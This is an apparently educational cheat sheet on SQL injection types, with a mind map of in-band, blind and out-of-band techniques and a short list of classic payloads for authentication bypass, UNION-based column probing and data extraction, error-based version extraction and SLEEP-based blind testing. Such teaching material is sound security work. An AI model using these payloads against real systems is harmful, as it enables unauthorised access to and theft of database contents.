SQL Injection Types
Different SQL injection techniques
SQL Injection FundamentalsTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[SQLi Types] --> B[In-Band]
A --> C[Blind]
A --> D[Out-of-Band]
B --> E[Union-Based]
B --> F[Error-Based]
C --> G[Boolean-Based]
C --> H[Time-Based]
D --> I[DNS Exfiltration]
E --> J[Extract data directly]
F --> K[Use error messages]
G --> L[True/False responses]
H --> M[SLEEP delays]
Related Modules
Quick Reference
Detection
' OR '1'='1 # Basic auth bypass payload ' OR 1=1-- # Tautology payload with comment " OR ""=" # Double quote auth bypass
Union Based
' UNION SELECT NULL,NULL,NULL-- # Determine column count ' UNION SELECT 1,user(),database()-- # Extract user and database name
Error Based
' AND extractvalue(1,concat(0x7e,(SELECT @@version)))-- # Error-based extraction of version
Blind
' AND SLEEP(5)-- # Test for time-based blind SQLi ' AND IF(1=1,SLEEP(5),0)-- # Conditional time-based check